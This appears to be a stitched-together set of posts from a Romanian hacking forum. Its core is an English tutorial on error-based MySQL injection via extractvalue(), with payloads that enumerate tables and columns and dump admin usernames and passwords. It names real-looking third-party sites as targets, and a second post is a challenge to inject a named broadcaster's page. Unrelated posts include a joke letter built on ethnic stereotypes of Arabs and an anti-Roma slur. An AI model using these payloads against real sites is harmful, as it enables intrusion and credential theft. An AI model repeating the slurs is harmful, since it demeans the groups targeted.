denjacker

Bianca are prezumtia de nevinovatie pana la proba contrarie definitiva, chiar daca acuzatiile vin din 2 parti. Inlocuieste "mancat ciocolata" cu "comis crima" .... pe cine bagi in puscarie si de ce ? Tudor si Alex pot fi complici..

Introduction. In this tutorial i will be teaching you SQL injection using the xml function extractvalue() to extract data from mySQL versions 5.1 and above. This tutorial assumes that you have an understanding of the structure of mySQL and the basic functions and operators needed for SQL injection so i wont be covering them. Advantages of this injection type - No need for union. - Can find version(), user(), database() without using select. - Good error based injection to use when getting the error "The used select statements have a diffrent number of columns" with union. - More clearer than the generic Double Query. Disavantages - extractvalue() isnt supported on mySQL versions below 5.1 The tutorial. Grabbing the targets mySQL server data So you have found a website and have confirmed that an SQL injection exist by adding a single quote after the parameter and receiving a mySQL error, now we can extract the version, user, database etc by using this injection: www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))-- Result: 'Xpath syntax error: 5.5.9:user@localhost' So we have received the version() and user() by error message so we know its vulnerable so we will move on to gaining the admins login details. Finding the database tables www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))-- Result: 'Xpath syntax error: <address' So now we have the first table in the database 'address' by using LIMIT to skip all the information_schema tables. Now we need to go through the tables using 'limit' untill we find a table named admin, user, tbl_admin, users or similar www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 160,1)))-- Result: 'Xpath syntax error: :users' So we have found a table named 'users' which will most likely hold the columns which contain the usernames and passwords. Now we move onto finding the column names. protip: Start at limit 75,1 to skip the database schema tables. Finding the database columns So now that we have selected the table we want we now need to find the columns containing the login data, look for username, password, user, pass or similar. www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))-- Result: 'Xpath syntax error: :username' So on the 1051st column we found the column named 'username', now we need to look for the column containing the password. www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))-- Result: 'Xpath syntax error: :password' So on the 1151st column in the database we found the column named 'password'. Now we move onto the final step. Protip: Start at limit 970,1 to skip all the Database schema columns. Extracting data - the final step All we do now is join the columns together from the users table like so. www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))-- Result: 'Xpath syntax error: :Admin:password1' Whoila! you now have the admin login details in username:password format. You can find a good example of when to use this injection here: http://www.sientries.co.uk/event.php?event_id=460 Hope you like this tutorial, please take time to leave your feedback. Credits: --Error 403 - forbidden-- @ HF

Scrisoarea unui terorist arab din Romania Zalutam cu rezbekt, Jefu. Aderizat la Romania cu bomba la valiza ascuns, tregut fara broblem control la aerobort. Pastrat dolar american blestemat, bentru construit aigea bomba, dat jumadate la taxi, jumate furat tigan din buzunar. Indalnit frate Ahmed, batron magazin, ajudat la mine. Discutat cu el la cafenea plan bomba, consumat egler broaspat, intoxicat cu zalmonel, noi ajuns la sbital, doctor roman durut la cur, noi luat cur fok. Jefu, gu bomba praf antrax nu putut facut la Romania, cineva furat antrax, deci ingercat plan bomba cu bum-bum…! Mutat apartament frate Ahmed, adus mult frumos aminde de tara mia, fara apala robinet, geamm sparte ca la Beirut, tigle kazut cap cind vind bate. Urmarit PROTV emiziune explozia camion azotat, facut frica la mine. Astia romani are tupeu nu gluma ! Urgent trebuie recrutat, jefu !Bomba cu azotat mare efect aveam… Inderesat pilotat avion bentru lovit gladire la roman. Vazut delevizor, aparat zbor MIG brabusit singur in ogor la taran, plus taran roman stricat singur gladire, adormit beat , tigara abrinsa, murit soacra, facut chef mare la ei… Draga Jefu, gineva furat la mine gas pastrat bentru bus la bomba, iar azeara, gind iesit cumbarat baclava, exblodat budelie la barter. Aicia la Romania, mult cretin! Zbierat, zguibat la sin, cacat be mine de frica ! Jefu, ma indorg acasa! Asta romani nu are nevoie de terorism, face singur treaba.

Felicitari ptr. tromfil, raspunsul lui a fost validat !! mai astept si altii ::bump:: Later Edit: ----------------------- Vad ca nu se prea implica lumea .. Ar fi bine de stiut daca a incercat cineva in afara de tromfil.. Vreti un tutorial sau mai asteptam sa mai incercati ? Macar sa stiu daca exista persoane interesate de subiect .

Felicitari! Sa ne traiesti maestre si la mai multe. Ateptam cupa la mondiale!

Se da urmatorul parametru : http://www.radiobremen.de/apps/php/mediathek/metadaten.php?id=040903 .. evident complet nesanitizat! Nu e cazul sa va complicati cu tehnici de bypass ptr ca nu exista absolut nici un filtru care sa blocheze functii, operatori sau alte caractere. Totul consta in manipularea Query-ului deja existent in metadaten.php in asa fel incat executia injectiei sa nu intre in conflict cu el. Am spus in titlu : "EXTRA-Difficult" ptr ca sunt 2-3 lucruri care se tin lant si de care neaparat trebuie sa tineti cont , dar ca si tehnica nu este neaparat foarte foarte dificila. Problema este sa aflati inainte de toate care sunt acele lucruri. Cerintele sunt : - injectarea parametrului folosind strict UNION SELECT .. se poate si BLIND sau ERROR BASED dar nu ma intereseaza acel gen de sintaxe. - postati un screenshot [preferabil cu injectia cenzurata] in care ati extras cateva informatii de baza care sa dovedeasca faptul ca ati reusit :versiune, nume db, system user, OS, ...etc .. ce vreti voi, nu conteaza foarte mult ce anume. - sau trimiteti un PM cu sintaxa ptr validare. Nu se vor face publice! Screenshot-ul meu Castigatorii vor fi afisati in lista de mai jos: And the WINNERS aaaaaaareeee: ---------------------------------------------- [1] :::: tromfil [2] :::: tdxev [3] :::: jesus [4] :::: birouamar [5] :::: to be edited.. ----------------------------------------------- Asadar ..

10x vlad .. e chiar clasica solutia. Atat ca se incarca site-ul putin mai greu.. dar merge.

Gabriel87 cu placere..Dan da! Nytro.. inchide te rog topicul!

nu .. probleme cu hostu , ns-uri si alte chestii inexplicabile. Puscas lipseste, ii simtim lipsa, ne e dor de el pisal-as in freza!

RWRpdGF0aSA6CkM6XFdpbmRvd3NcU3lzdGVtMzJcZHJpdmVyc1xldGNcaG9zdHMKYWRhdWdhdGkg IG8gbGluaWUgbm91YToKCjg5LjM3LjU5LjI1IHd3dy5pbnNlY3VyaXR5LnJvIGluc2VjdXJpdHku cm8KClJlZnJlc2gh

Hybrid - Dissapear Here Hybrid - Can You Hear Me Hybrid - Formula of Fear Hyper - We Control The Crystal Method - Acetone

Ptr. cei in afara troll-ului, sa urmariti animatile de prin promo-uri pe MTV.

Google Translate )

Nu e o noutate ca parerile sunt impartite. Dar daca cineva vine cu o idee, si vrea sa dezvolte subiectul cu cineva interesat de tema, de ce parastasul curcilor trebuie sa sara cel putin 1 care sa o dea in diverse ca el are dreptate (de parca ar avea destule dovezi fundamentale clare) si ca ideea de la care a plecat discutia e total gresita! Nu esti deacord cu topicul, move on! Like A Bowss! lasa tema sa curga .

no shit ...Einstein!

YouTube - Illuminati - The Music Industry Exposed [Full Length] dai play de la minutul 43:00

_______________________________